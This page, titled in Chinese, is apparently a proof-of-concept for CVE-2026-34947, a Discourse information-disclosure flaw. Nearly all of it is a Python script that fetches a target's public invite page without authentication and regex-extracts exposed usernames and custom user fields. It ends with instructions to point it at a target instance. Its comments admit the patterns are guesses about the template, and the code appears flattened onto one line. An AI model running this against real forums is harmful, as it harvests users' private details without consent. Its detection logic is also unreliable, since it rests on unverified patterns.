CVE-2026-34947 Discourse信息泄露漏洞

import requests import re # POC for CVE-2026-34947: Discourse Information Disclosure # Description: Checks if staged user details are exposed on public invite pages. def check_vulnerability(target_invite_url): try: # Send request without authentication headers = { 'User-Agent': 'CVE-2026-34947-Scanner/1.0' } response = requests.get(target_invite_url, headers=headers, timeout=10) if response.status_code == 200: content = response.text # Regex patterns to identify potential leaked data # Note: Patterns depend on actual Discourse template structure username_pattern = r'data-username="([^"]+)"' custom_field_pattern = r'user-custom-field.*?>([^<]+)' usernames = re.findall(username_pattern, content) custom_fields = re.findall(custom_field_pattern, content) if usernames or custom_fields: print(f"[+] Potential Vulnerability Detected at: {target_invite_url}") if usernames: print(f" [+] Exposed Usernames: {usernames}") if custom_fields: print(f" [+] Exposed Custom Fields: {custom_fields}") return True else: print(f"[-] No data exposed on: {target_invite_url}") return False else: print(f"[-] HTTP Error {response.status_code} for {target_invite_url}") return False except Exception as e: print(f"[!] Error connecting to {target_invite_url}: {e}") return False # Example usage # Replace with a valid invite link from a target instance # target = "http://example.com/invites/xyz" # check_vulnerability(target)